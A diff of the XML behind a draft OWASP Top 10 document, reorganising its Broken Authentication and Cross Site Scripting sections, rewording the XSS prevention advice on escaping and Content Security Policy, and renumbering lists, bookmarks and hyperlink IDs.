         <w:t xml:space="preserve">Evidence of identity, authentication and session management are critical for separating malicious unauthenticated attackers with users who you might have a legal relationship.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Common authentication vulnerabilities include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1007"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">missing multi-factor authentication, such as TOTP, token, or risk based authentication</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1007"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">permits credential stuffing, which is where the attacker has a list of valid usernames and passwords. Applications should monitor and block many login attempts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1007"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">permits brute force attacks against default and well known passwords</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1007"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">permits weak or well known passwords, such as "Password1" or "admin/admin"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1007"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", which cannot be made safe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1007"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">plain text, encrypted, or weakly hashed passwords permit the rapid recovery of passwords using GPU crackers or brute force tools</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Common session management vulnerabilities include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1008"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Not providing an effective logout function</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1008"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Not revoking server side session tokens (a common oAuth and JWT pattern)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="am-i-vulnerable-to-attack-1"/>
-      <w:bookmarkEnd w:id="41"/>
-      <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Common authentication vulnerabilities include:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1006"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">missing multi-factor authentication, such as TOTP, token, or risk based authentication</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1006"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">permits credential stuffing, which is where the attacker has a list of valid usernames and passwords. Applications should monitor and block many login attempts</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1006"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">permits brute force attacks against default and well known passwords</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1006"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">permits weak or well known passwords, such as "Password1" or "admin/admin"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1006"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", which cannot be made safe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1006"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">plain text, encrypted, or weakly hashed passwords permit the rapid recovery of passwords using GPU crackers or brute force tools</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Common session management vulnerabilities include:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1007"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Not providing an effective logout function</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1007"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Not revoking server side session tokens (a common oAuth and JWT pattern)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="how-do-i-prevent-1"/>
-      <w:bookmarkEnd w:id="42"/>
+      <w:bookmarkStart w:id="43" w:name="how-do-i-prevent-1"/>
+      <w:bookmarkEnd w:id="43"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -1791,11 +1776,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1008"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId43">
+          <w:numId w:val="1009"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId44">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1811,7 +1796,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1008"/>
+          <w:numId w:val="1009"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1823,7 +1808,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1008"/>
+          <w:numId w:val="1009"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1835,7 +1820,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1008"/>
+          <w:numId w:val="1009"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1847,7 +1832,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1008"/>
+          <w:numId w:val="1009"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1859,7 +1844,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1008"/>
+          <w:numId w:val="1009"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1871,7 +1856,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1008"/>
+          <w:numId w:val="1009"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1897,7 +1882,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId44">
+      <w:hyperlink r:id="rId45">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1914,7 +1899,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId45">
+      <w:hyperlink r:id="rId46">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1930,8 +1915,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="46" w:name="example-scenarios-1"/>
-      <w:bookmarkEnd w:id="46"/>
+      <w:bookmarkStart w:id="47" w:name="example-scenarios-1"/>
+      <w:bookmarkEnd w:id="47"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -1955,7 +1940,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId47">
+      <w:hyperlink r:id="rId48">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2003,7 +1988,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId48">
+      <w:hyperlink r:id="rId49">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2019,8 +2004,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="49" w:name="references-1"/>
-      <w:bookmarkEnd w:id="49"/>
+      <w:bookmarkStart w:id="50" w:name="references-1"/>
+      <w:bookmarkEnd w:id="50"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -2029,8 +2014,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="50" w:name="owasp-1"/>
-      <w:bookmarkEnd w:id="50"/>
+      <w:bookmarkStart w:id="51" w:name="owasp-1"/>
+      <w:bookmarkEnd w:id="51"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -2039,11 +2024,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId44">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId45">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2056,11 +2041,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId45">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId46">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2073,11 +2058,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId45">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId46">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2090,11 +2075,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId51">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId52">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2107,11 +2092,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId52">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId53">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2124,11 +2109,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId53">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId54">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2141,11 +2126,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId54">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId55">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2158,11 +2143,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId55">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId56">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2175,11 +2160,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1009"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId56">
+          <w:numId w:val="1010"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId57">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2192,8 +2177,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="57" w:name="external-1"/>
-      <w:bookmarkEnd w:id="57"/>
+      <w:bookmarkStart w:id="58" w:name="external-1"/>
+      <w:bookmarkEnd w:id="58"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -2202,11 +2187,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1010"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId58">
+          <w:numId w:val="1011"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId59">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2219,11 +2204,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1010"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId59">
+          <w:numId w:val="1011"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId60">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2236,8 +2221,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="60" w:name="a3-cross-site-scripting"/>
-      <w:bookmarkEnd w:id="60"/>
+      <w:bookmarkStart w:id="61" w:name="a3-cross-site-scripting"/>
+      <w:bookmarkEnd w:id="61"/>
       <w:r>
         <w:t xml:space="preserve">A3 Cross Site Scripting</w:t>
       </w:r>
@@ -2480,14 +2465,21 @@
             </w:r>
           </w:p>
         </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="61" w:name="am-i-vulnerable-to-attack-2"/>
-      <w:bookmarkEnd w:id="61"/>
+      <w:bookmarkStart w:id="62" w:name="am-i-vulnerable-to-attack-2"/>
+      <w:bookmarkEnd w:id="62"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -2499,27 +2491,39 @@
       <w:r>
         <w:t xml:space="preserve">You are vulnerable to Server XSS if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have Client XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs, but escaping (and to a lesser extent) input validation can be used to make this safe.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Automated tools can find some XSS problems automatically.</w:t>
+      </w:r>
       <w:r>
         <w:br w:type="textWrapping"/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Automated tools can find some XSS problems automatically.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3rd party libraries built on top of these technologies. This diveristy makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.</w:t>
+        <w:t xml:space="preserve">However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3rd party libraries built on top of these technologies.</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This diveristy makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries.</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="62" w:name="how-do-i-prevent-2"/>
-      <w:bookmarkEnd w:id="62"/>
+      <w:bookmarkStart w:id="63" w:name="how-do-i-prevent-2"/>
+      <w:bookmarkEnd w:id="63"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -2534,37 +2538,102 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">To avoid Server XSS, the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">To avoid Client XSS, the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the OWASP DOM based XSS Prevention Cheat Sheet.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">For rich content, consider auto-sanitization libraries like OWASP’s AntiSamy or the Java HTML Sanitizer Project.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Use</w:t>
+        <w:numPr>
+          <w:numId w:val="1012"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId63">
+      <w:hyperlink r:id="rId64">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Server XSS</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">vulnerabilities. The</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId65">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP XSS Prevention Cheat Sheet</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">has details on the required data escaping techniques.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1012"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Applying context sensitive encoding when modifying the browser document on the client side acts against</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId66">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">client XSS</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId67">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP DOM based XSS Prevention Cheat Sheet</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1012"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Enabling a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId68">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2573,18 +2642,15 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">(CSP) to mitigate the impact of potential XSS across your entire site.</w:t>
+        <w:t xml:space="preserve">) (CSP) and moving inline javascript code to additional files will defend against XSS across the entire site, assuming no other vulnerabilities (such as upload path tampering or download path traversal) exist that would allow placing malicious code in the server files.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="64" w:name="example-scenarios-2"/>
-      <w:bookmarkEnd w:id="64"/>
+      <w:bookmarkStart w:id="69" w:name="example-scenarios-2"/>
+      <w:bookmarkEnd w:id="69"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -2613,7 +2679,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The attacker modifies the ‘CC’ parameter in his browser to:</w:t>
+        <w:t xml:space="preserve">The attacker manipulates the ‘CC’ parameter in his browser to:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2638,23 +2704,25 @@
         <w:br w:type="textWrapping"/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See 2017-A8 for info on CSRF.</w:t>
+        <w:t xml:space="preserve">Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See 2017-A8 for information on CSRF.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="65" w:name="references-2"/>
-      <w:bookmarkEnd w:id="65"/>
+      <w:bookmarkStart w:id="70" w:name="references-2"/>
+      <w:bookmarkEnd w:id="70"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="71" w:name="owasp-2"/>
+      <w:bookmarkEnd w:id="71"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -2663,7 +2731,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1013"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -2680,7 +2748,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1013"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -2697,7 +2765,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1013"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -2709,49 +2777,108 @@
           <w:t xml:space="preserve">OWASP Testing Guide: 1st 3 Chapters on Data Validation Testing</w:t>
         </w:r>
       </w:hyperlink>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1013"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Types of Cross-Site Scripting</w:t>
       </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1013"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP XSS Prevention Cheat Sheet</w:t>
       </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1013"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP DOM based XSS Prevention Cheat Sheet</w:t>
       </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1013"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP XSS Filter Evasion Cheat Sheet</w:t>
       </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
